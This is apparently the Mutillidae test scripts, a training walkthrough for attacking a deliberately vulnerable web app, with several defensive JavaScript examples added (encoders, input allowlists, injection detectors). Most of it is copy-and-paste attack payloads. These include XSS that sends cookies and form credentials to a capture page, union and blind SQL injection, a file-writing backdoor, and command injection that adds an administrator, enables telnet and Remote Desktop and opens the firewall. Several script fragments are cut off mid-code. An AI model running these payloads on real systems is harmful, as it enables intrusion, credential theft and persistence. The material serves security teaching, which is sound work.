Mutillidae Test Scripts


  • 8/12/2019 Mutillidae Test Scripts

    1/27

    Topics

    Installation

    XAMPP
    VM
    Samurai - Bootable DVD
    Samurai Installation
    Custom Bootable DVD

    Mutillidae Uses

    1. Teach web developers how to write secure code
    2. Teach web developers what exploits may be possible
    3. Teach web developers insecure coding patterns
    4. Demonstrate to DBAs what exploits may be possible
    5. Demonstrate to management what exploits may be possible

    --------------------Demonstration--------------------

    Pen Testing Methodology (CEH version)

    Recon
    Scanning (Discover hosts, ports, services, internal network map, Enumerating user names)
    Gaining Access
    Maintaining Access
    Cover Tracks

    ----------------------------------------BEEF Framework----------------------------------------

    Put this text into the add-to-my-blog as a blog entry:

    Most developers do not understand how dangerous XSS can be

    ----------------------------------------Grendel Scan----------------------------------------

    Backtrack 5:

    Change directory to /pentest/web/grendel-scan/.
    Run grendel.sh to pull up GUI.
    Provide target URL.
    Provide non-existent output directory.
    Configure plug-ins.
    Run scan.

    When scan is done, click terminate scan.
    Report will be generated.

    ----------------------------------------RatProxy----------------------------------------

    To scan generally:
    Backtrack 5:

    Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -lextscgj

    Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

    To find XSS:
    Backtrack 5:

    Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -x

    Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html

    ----------------------------------------SQLMAP----------------------------------------

    *** CONFIRMED! ***
    python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump

    ----------------------------------------HTML 5 - Injecting XSS into JSON----------------------------------------

    Page: pen-test-tool-lookup.php

    Beginner: Pop up an alert box to show injection worked

    Unencoded: "}} );alert(1);//
    Complete Injection: "}} )%3balert(1)%3b//
    Prefix: "}} )%3b
    Payload: alert(1)%3b
    Suffix: //

    Copy and Paste: "}} )%3balert(1)%3b//

    Intermediate: Steal cookie with redirection

    Unencoded: "}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;//

    Prefix: "}} )%3b
    Payload: document.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b
    Suffix: //
    Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//

    Copy and Paste:

    "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//

    Professional: Steal cookies with XHR injection

    --------------------------------------------------------------------------------
    Generic XHR using GET and XMLHttpRequest to steal cookies - prefix and suffix as necessary

    - This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well.

    NOTE: During Reconnaissance, study your target to determine what kind of browser they have so the scripts can be tailored and tested for those browsers.

    --------------------------------------------------------------------------------

    This is a "UDP-style GET". We fire and forget but cannot know if it succeeded or failed. Perfect for using against savvy users.

    Copy and Paste:

    var lXMLHTTP; try{ var lAction = "http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie; lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){}; lXMLHTTP.open("GET", lAction);lXMLHTTP.send(""); }catch(e){}

    --------------------------------------URL Encoded Version--------------------------------------
    Prefix: "}} )%3b
    Payload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d
    Suffix: //
    Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//

    Copy and Paste:

    "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
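An added defensive example, not part of the original Mutillidae test script, showing why the `"}} );alert(1);//` breakout used in this section works against string concatenation and how serializing the value for a script context makes it inert. Node.js is assumed as the runtime; `lookupTool`, `buildScriptUnsafe`, `buildScriptSafe`, `jsonForScript` and `runInSandbox` are names constructed for the illustration, not functions of the Mutillidae page.

```javascript
// Added example, not from the Mutillidae test script. lookupTool, the
// buildScript* helpers and runInSandbox are illustration names (assumed),
// not functions of the Mutillidae page.

// The breakout string used on the page, kept here as a constructed constant.
const PAGE_PAYLOAD = '"}} );alert(1);//';

// Vulnerable pattern: the server drops a request value straight into a
// JSON/JavaScript literal by string concatenation. A double quote followed by
// }} ); closes the string, the object and the call; anything after it runs.
function buildScriptUnsafe(toolName) {
  return 'lookupTool( {"tool": {"name": "' + toolName + '"}} );';
}

// Hardened pattern: JSON.stringify escapes quotes and backslashes, and the
// extra replacements cover what JSON leaves alone but a browser still treats
// specially inside a <script> block: </script>, <!-- and the U+2028/U+2029
// line terminators.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function buildScriptSafe(toolName) {
  return 'lookupTool( {"tool": {"name": ' + jsonForScript(toolName) + '}} );';
}

// Execute a generated script with stub lookupTool/alert functions and report
// what it called. The Function constructor stands in for the browser parsing
// an inline <script>; no real alert box or DOM is involved.
function runInSandbox(src) {
  const calls = { alerts: 0, names: [] };
  const lookupTool = (arg) => { calls.names.push(arg.tool.name); };
  const alert = () => { calls.alerts += 1; };
  new Function('lookupTool', 'alert', src)(lookupTool, alert);
  return calls;
}

// Stand-alone demo: the unsafe builder lets the payload call alert once,
// the safe builder passes the whole string through as data.
console.log('unsafe:', runInSandbox(buildScriptUnsafe(PAGE_PAYLOAD)));
console.log('safe:  ', runInSandbox(buildScriptSafe(PAGE_PAYLOAD)));
```

The detail that matters is the context: `JSON.stringify` alone is enough for a value that becomes a JavaScript string, but a value written into an inline `<script>` also has to survive the HTML parser, which is why `<`, `>` and `&` are written as `\u00XX` escapes rather than left in place.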

    --------------------------------------------------------------------------------HTML 5 - Local and session storage - setting values--------------------------------------------------------------------------------

    Setting Test Values for HTML5 Storage

    // You can use these statements to set some test values.

    localStorage.setItem("key1","value1");
    localStorage.setItem("key2","value2");
    sessionStorage.setItem("key1","value1");
    sessionStorage.setItem("key2","value2");

    --------------------------------------------------------------------------------HTML 5 - Local and session storage - Reading values--------------------------------------------------------------------------------

    --------------------------------------------------------------------------------Reading current HTML5 storage from local browser--------------------------------------------------------------------------------

    try{

    var m = "";var l = window.localStorage;var s = window.sessionStorage;

    for(i=0;i


    .getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}

    --------------------------------------------------------------------------------HTML 5 - Local and session storage - Adding values--------------------------------------------------------------------------------

    --------------------------------------------------------------------------------Adding values to HTML5 Storage (Possible Session Fixation)--------------------------------------------------------------------------------

    localStorage.setItem("AccountNumber","123456");
    sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");
    sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");
    sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");

    Copy and Paste script to add values - TESTED SUCCESSFULLY

    try{localStorage.setItem("AccountNumber","123456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}

    Copy and Paste script to read values (Alert box version)

    try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


    structSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


    .getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}try{localStorage.setItem("MessageOfTheDay","This was set by Firebug console!"); sessionStorage.setItem("CartSession","ABCDEFG");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


    ge.removeItem("CartSession");}catch(e){console.log(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i


    r s = window.sessionStorage;for(i=0;i


    try{var m = "";var l = window.localStorage;for(i=0;i


    m += "localStorage(" + l.key(i) + "):" +l.getItem(l.key(i)) + "; ";

    }

    var lAction = "http://localhost/mutillidae/capture-data.php?html5storage=" + m;

    lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){};

    lXMLHTTP.open("GET", lAction);lXMLHTTP.send("");

    }catch(e){}

    Copy and Paste
    Reflected Cross Site Script - TESTED SUCCESSFULLY

    try{ var s = sessionStorage; var l = localStorage; var m= ""; var lXMLHTTP; for(i=0;i


    Recon: Determine current directory

    Windows XP: && dir
    Linux: && pwd

    Recon: Chain commands to discover directory structure

    Windows XP: && cd ../../.. && dir
    Linux: && cd ../../.. && ls -l

    Recon: Get a list of offerings provided by the "net.exe" program

    Windows XP: && net

    Recon: Get a list of services that can be started or stopped

    Windows XP: && net start
    Windows XP: && net stop

    Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.

    Windows XP: && ipconfig /all
    Linux: && ifconfig

    Scanning: Discover hosts on network

    Windows XP: && ping -n 1 192.168.56.102
    Linux: && ping -c 1 192.168.56.102

    Scanning: Enumerate Current user

    Windows XP: && set
    Linux: && whoami

    Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups

    Windows XP: && net view [/domain]
    Windows XP: && net user [/domain]
    Windows XP: && net localgroup [/domain]

    Gaining Access: Add user

    Windows XP: && net user /add
    Linux: useradd

    Gaining Access: Delete user

    Windows XP: && net user /delete

    Maintain Access: Get Windows Service Names

    Windows: sc query

    Maintain Access: kill AV

    net stop

    Maintain Access: kill firewall


    Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=)

    whatever && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=

    ----------------------------One combined injection:----------------------------

    whatever && sc config tlntsvr start= demand && sc start tlntsvr && net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

    ------------------------------------------------------------------------------------------------------------Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service------------------------------------------------------------------------------------------------------------

    Check if service running (sc query termservice)
    Configure service from "disabled" to "manual" (sc config termservice start= demand)
    Start service (sc start termservice)
    Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f)
    Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v TSEnabled /t reg_dword /d 1 /f)
    Check if service listening (netstat -na | find "3389")
    Add user (net user /add)
    Add user to group (net localgroup "Remote Desktop Users" /add)
    Configure firewall to allow RDP (netsh firewall set service type=remotedesktop mode=enable scope=custom addresses=)
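An added defensive example, not part of the original test script, for the command-injection steps above: every one of them (the recon and scanning commands, the combined telnet injection, the Remote Desktop enablement) depends on the dns-lookup hostname being pasted into a shell command line where `&&` chains a second command. The Node.js code below (assumed runtime) rejects anything that is not a hostname, builds the lookup as an argv array that no shell ever parses, and scans request logs for the chaining. `isValidHostname`, `buildLookupCommand`, `flagCommandInjection` and the log lines are constructed for the illustration.

```javascript
// Added example, not from the Mutillidae test script. All names and the
// sample log lines below are constructed for the illustration.

// RFC 1123 hostname: labels of letters, digits and inner hyphens, joined by
// dots, at most 253 characters. Shell metacharacters cannot match this.
const HOSTNAME_RE =
  /^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/i;

function isValidHostname(input) {
  return typeof input === 'string' && HOSTNAME_RE.test(input);
}

// Build the lookup as a program plus argument vector. Handing this to
// child_process.execFile (not exec) means no shell sees the value, so a
// value like "x && dir" would be resolved as a literal name, never run.
// The allowlist is still applied first so junk never reaches the resolver.
function buildLookupCommand(hostname) {
  if (!isValidHostname(hostname)) {
    throw new Error('hostname rejected by allowlist: ' + JSON.stringify(hostname));
  }
  return { file: 'nslookup', args: [hostname] };
}

// Detection side: decode the hostname field from request-log lines and flag
// values that contain shell chaining or that fail the allowlist.
const SHELL_CHAIN_RE = /(&&|\|\||[;|`]|\$\()/;

function decodeFormValue(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

function flagCommandInjection(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = /hostname=([^&\s]*)/.exec(line);
    if (!m) continue;
    const value = decodeFormValue(m[1]);
    if (SHELL_CHAIN_RE.test(value)) {
      hits.push({ value, reason: 'shell-chaining' });
    } else if (!isValidHostname(value)) {
      hits.push({ value, reason: 'not-a-hostname' });
    }
  }
  return hits;
}

// Constructed request-log lines (form bodies logged URL-encoded, so the
// chaining appears as %26%26 and spaces as +).
const SAMPLE_LOG = [
  '192.168.56.1 POST /mutillidae/dns-lookup.php hostname=www.example.com',
  '192.168.56.1 POST /mutillidae/dns-lookup.php hostname=www.example.com+%26%26+dir',
  '192.168.56.1 POST /mutillidae/dns-lookup.php hostname=localhost+%26%26+net+user+%2Fadd',
  '192.168.56.1 POST /mutillidae/dns-lookup.php hostname=192.168.56.102',
  '192.168.56.1 POST /mutillidae/dns-lookup.php hostname=www.example.com+%26%26+ipconfig+%2Fall',
];

console.log(flagCommandInjection(SAMPLE_LOG));
```

The allowlist is the real control; the log scan is a second line that catches attempts against a deployment that has not yet been fixed, and it only works on the decoded value, since the raw body never contains a literal `&&`.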

    -------------------------SQL Injection-------------------------

    Recon: Returns a string that indicates the MySQL server version

    Page: user-info.php
    Field: Username
    Value: ' union select null,VERSION() AS username,null,null --

    ' union select null,null,null,version() --

    Recon: Returns a string that indicates the current database name

    Page: user-info.php
    Field: Username
    Value: ' union select null,DATABASE() AS username,null,null --

    Recon: Returns a string that indicates the current database username

    Page: user-info.php
    Field: Username
    Value: ' union select null,USER() AS username,null,null --

    Recon: Extract table names from database

    Page: user-info.php
    Field: Username
    Value: ' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES--

    Recon: Extract table columns from database using a single field

    Page: user-info.php
    Field: Username
    Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--

    Recon: Extract views from database (Doesn't work in MySQL 5.1.8)

    Page: user-info.php
    Field: Username
    Value: ' union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS--

    Recon: Extract triggers from database

    Page: user-info.php
    Field: Username
    Value: ' union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

    Recon: Extract routines/procs from database

    Page: user-info.php
    Field: Username
    Value: ' union select null,concat_ws('.', routine_schema, routine_name, '(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES--

    Recon: Extract metadata from database

    Page: user-info.php
    Field: Username
    Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name)AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--

    Recon/Scanning: Get specifications on database software

    Page: user-info.php
    Field: Username
    Value: ' union select null, database(), current_user(), version() --

    Gaining Access: Extract passwords from user table

    Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --


    Maintaining Access:

    Covering Tracks:

    Page: login.php

    Gaining Access: Using SQL Injection

    ' or 1=1 --

    Inserting new user using insert injection to bypass any protections. This example inserts a cross site script.

    Page: Register.php
    Field: Username

    backdoor','password','alert(\'Mallicious user input\')') --

    Note: Kind of pointless but still fun

    Using advanced techniques: Select Concat Char

    Page: user-info.php

    This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs.

    ' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null --

    Using advanced techniques: Select Using IFNULL to search for columns

    Page: user-info.php
    ' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(CAST(password AS CHAR),CHAR(32)),null FROM accounts --

    Using advanced techniques: Open files on target operating system

    Page: user-info.php
    Field: username
    Values:

    ' union select null, LOAD_FILE('../README') AS username, null, null--

    ' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--

    ' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--

    ' union select null, LOAD_FILE('mysql_error.log'), null, null--

    ' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null--

    Using advanced techniques: Writing files to operating system
    Page: user-info.php
    Field: username
    Values:

    ' union select null,null,null,'Please enter system command


    td>Command' INTODUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --


    Using advanced techniques: Insert Injection

    Technique: SQL Insert Injection
    Page: add-to-your-blog.php
    Field: blog
    Value: BARK','2003-12-31 01:02:03') --

    --------------------------------------------------Blind SQL Injection--------------------------------------------------

    Recon: Blind SQL Injection/Brute Forcing values

    ' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --

    ' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) --

    ' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --


    ' union Select null, sleep(5) --

    Page: login.php
    Technique: Blind SQL Injection - Timing
    Field: username
    Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
    Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1

    Page: login.php
    Technique: Blind SQL Injection - True and False Values
    Field: username
    True Value (Using Proxy): ' or 1=1 --
    False Value (Using Proxy): ' and 1=0 --
    Examine responses to see if they are different
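An added detection example, not part of the original test script, covering both the union-based payloads of the SQL Injection section and the timing payloads of this Blind SQL Injection section: it decodes form bodies the way the "Using Direct Request" value above is encoded and classifies each decoded field. Node.js is assumed; the pattern names, `parseFormBody`, `classifySqli`, `scanRequests` and the sample requests are constructed for the illustration. The application-side fix remains a parameterized query; this scanner shows what a log review would surface, not a replacement for that fix.

```javascript
// Added example, not from the Mutillidae test script. Pattern names and the
// sample requests are constructed for the illustration.

// Decode one application/x-www-form-urlencoded value.
function decodeFormValue(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

// Parse a form body into { field: decodedValue }.
function parseFormBody(body) {
  const fields = {};
  for (const pair of body.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const val = eq === -1 ? '' : pair.slice(eq + 1);
    fields[decodeFormValue(key)] = decodeFormValue(val);
  }
  return fields;
}

// Signatures for the payload families used on the page. The order only
// decides the order of names in the result.
const SQLI_PATTERNS = [
  { name: 'union-select',       re: /\bunion\b[\s\S]*\bselect\b/i },
  { name: 'tautology',          re: /'\s*or\s+\d+\s*=\s*\d+/i },
  { name: 'time-based',         re: /\b(sleep|benchmark)\s*\(/i },
  { name: 'schema-or-file',     re: /information_schema|\bload_file\s*\(|into\s+(dump|out)file/i },
  { name: 'comment-terminator', re: /--\s*$|#\s*$|\/\*/ },
];

function classifySqli(value) {
  return SQLI_PATTERNS.filter((p) => p.re.test(value)).map((p) => p.name);
}

// Scan logged requests ({ path, body }) and report each field with findings.
function scanRequests(requests) {
  const report = [];
  for (const req of requests) {
    const fields = parseFormBody(req.body);
    for (const [field, value] of Object.entries(fields)) {
      const findings = classifySqli(value);
      if (findings.length) report.push({ path: req.path, field, value, findings });
    }
  }
  return report;
}

// Constructed sample: one benign login, the page's direct-request timing
// payload, and the ' or 1=1 -- login bypass.
const SAMPLE_REQUESTS = [
  { path: '/mutillidae/login.php',
    body: 'username=alice&password=correct+horse&login-php-submit-button=1' },
  { path: '/mutillidae/login.php',
    body: 'username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1' },
  { path: '/mutillidae/login.php',
    body: 'username=%27+or+1%3D1+--+&password=&login-php-submit-button=1' },
];

console.log(JSON.stringify(scanRequests(SAMPLE_REQUESTS), null, 2));
```

Decoding before matching is the point: the raw body of the direct request contains no space, quote or parenthesis, so a signature applied to the undecoded line would miss it, and `+` has to become a space before `' or 1=1` can be recognised.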

    ------------------------------------------------------------------------------------------Broken Authentication and Session Management - Escalating privileges------------------------------------------------------------------------------------------

    Gaining Access: Using insecure client-side authentication tokens

    Page: Any page
    Tool: Web Developer Toolbar

    Note what cookies the site has by default
    Create a test account
    Login using test account
    Check what cookies the site has after authentication
    Logout
    Verify auth cookies are gone or get rid of them

    Create a new cookie based on the original auth cookie, but with different value

    Gaining Access: Using insecure client-side authentication tokens

    Page: Any page
    Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)

    Note what cookies the site has by default
    Create a test account
    Login using test account
    Check what cookies the site has after authentication
    Differential Analysis: Change the value of the original auth cookie
    Work backwards until admin account is found

    ------------------------------------------------------------------------------------------Broken Authentication and Session Management - Bypass Authorization Control------------------------------------------------------------------------------------------

    Gaining Access: Using SQL injection

    Page: login.php
    Field: Username
    Value: ' or 1=1 --

    Gaining Access: Using SQL injection

    Page: login.php
    Field: Username
    Value: ' --

    ------------------------------------------------------------Insecure Direct Object Reference - Accessing system files------------------------------------------------------------

    Step 1: Recon: Obtain list of files

    Possible Technique: Use command injection
    Page: dns-lookup.php
    Value (Windows): && dir /w
    Value (Linux): && pwd && ls -l

    Possible Techniques: Use robots.txt
    Possible Techniques: Use directory browsing
    Possible Techniques: Use directory brute-forcing

    Step 2: Gaining Access: Retrieve system files

    Page: source-viewer.php
    Technique: Use proxy to change value, Use parent directory to bypass jails
    Tool: Tamper Data, Paros, WebScarab, Burp
    Field: phpfile
    Value: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd

    -----------------------------Cross Site Scripting-----------------------------

    Page: add-to-your-blog.php
    Field: blog contents
    Value: alert("Cookie stolen and sent to mallicious server: " + document.cookie + ". The developer should have encoded all output, validated all input, )

    HTTP Header: Browser User Agent String
    Tool: User Agent Switcher
    Value: Sorry, please login again
    Username
    Password

    Defense: Encoding
    Defense When certain tokens allowed: Mapping
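An added example, not part of the original test script, of the two defenses just named, together with the output encoding the Log Injection section later calls for. Node.js is assumed; `encodeForHtml`, `TOKEN_MAP`, `renderBlogEntry`, `safeLogValue` and `formatLogLine` are constructed names. Encoding turns a blog-content payload into inert text; mapping lets a fixed set of non-HTML tokens through by translating them to fixed markup after encoding, so user input itself never reaches the page as HTML.

```javascript
// Added example, not from the Mutillidae test script; all names constructed.

// Defense 1: contextual output encoding for an HTML text node.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Defense 2: mapping. Users write a small non-HTML token set; after the
// whole entry is encoded, only these exact tokens are translated to fixed
// markup. Anything not in the map stays encoded text.
const TOKEN_MAP = { '[b]': '<b>', '[/b]': '</b>', '[i]': '<i>', '[/i]': '</i>' };

function renderBlogEntry(rawEntry) {
  let out = encodeForHtml(rawEntry);
  for (const [token, html] of Object.entries(TOKEN_MAP)) {
    // The token itself was encoded in step one ('/' became &#x2F;), so match
    // its encoded form, never the raw one.
    out = out.split(encodeForHtml(token)).join(html);
  }
  return out;
}

// Log injection: neutralise control characters before writing so a value
// cannot forge a new log line, then HTML-encode so a log viewer such as
// show-log.php renders it as text.
function safeLogValue(value) {
  return String(value).replace(/[\x00-\x1f\x7f]/g, (c) => {
    if (c === '\n') return '\\n';
    if (c === '\r') return '\\r';
    if (c === '\t') return '\\t';
    return '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0');
  });
}

function formatLogLine(field, value) {
  return field + '=' + encodeForHtml(safeLogValue(value));
}

// Constructed input in the shape of the blog-content payload on the page.
const SAMPLE_ENTRY = '[b]Hello[/b] <script>alert(document.cookie)</script>';
console.log(renderBlogEntry(SAMPLE_ENTRY));
console.log(formatLogLine('username', 'admin\r\n192.168.56.1 - login OK <b>forged</b>'));
```

The order inside `renderBlogEntry` is what makes mapping safe: encode everything first, then replace known tokens with markup the application wrote itself. Doing it the other way round (map, then encode) would encode the generated tags, and skipping the encode step would let any tag the user typed through.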

    Page: add-to-your-blog.php
    Field: blog contents
    Tool: Burp-Suite
    Value:

    function capture(theForm){
        var lXMLHTTP;
        try{
            var lData = "username=" + theForm.username.value + "&password=" + theForm.password.value;
            var lHost = "localhost";
            var lProtocol = "http";
            var lAction = lProtocol + "://" + lHost + "/mutillidae/capture-data.php";
            var lMethod = "post";
            try{
                lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
            }catch (e){
                try{
                    lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
                }catch(e) {
                    try{
                        lXMLHTTP = new XMLHttpRequest();
                    }catch (e) {
                        alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
                    };//end try
                };//end try
            };//end try
            lXMLHTTP.onreadystatechange = function(){
                if(lXMLHTTP.readyState == 4){
                    theForm.parentNode.style.display="none";
                }// end if
            };
            lXMLHTTP.open(lMethod, lAction, true);
            lXMLHTTP.setRequestHeader("Host", lHost);
            lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            lXMLHTTP.send(lData);
        }catch(e){
            alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
        };
    };//end function

    We're sorry. This session has expired. Please login again. Username Password


    Defense: Encoding

    Page: add-to-your-blog
    Field: blog contents
    Value:

    var lXMLHTTP;
    try{
        var lData = "data=" + encodeURIComponent(document.cookie);
        var lHost = "localhost";
        var lProtocol = "http";
        var lFilePath = "/mutillidae/capture-data.php";
        var lAction = lProtocol + "://" + lHost + lFilePath;
        var lMethod = "POST";
        try {
            lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
        }catch (e) {
            try {
                lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
            }catch (e) {
                try {
                    lXMLHTTP = new XMLHttpRequest();
                }catch (e) {
                    //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
                }
            }
        }//end try
        lXMLHTTP.onreadystatechange = function(){}
        lXMLHTTP.open(lMethod, lAction, true);
        lXMLHTTP.setRequestHeader("Host", lHost);
        lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        lXMLHTTP.send(lData);
    }catch(e){}

    -----------------------------Cross Site Request Forgery-----------------------------

    Page: add-to-your-blog, view-someones-blogTool: HTTPFox (to view forged request)

    Force someone to add a blog without consent:


    -------------------------Security Misconfiguration-------------------------

    Improper Error Handling:

    Page: login.php
    Field: username
    Value:
    Result: Error gives SQL exception

    ---------------------------------Insecure Direct Object References---------------------------------

    Page: source-viewer.php
    Field: phpfile
    Value (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hosts
    Tool: netcat, tamper data, paros, webscarab, burp

    Use netcat or hackbar to send in post data:

    phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File"
    phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-submit-button="View File"

    Alternative: Use proxy to change value of phpfile to system file

    ---------------------------------Insecure Cryptographic Storage---------------------------------

    Extract passwords from system:

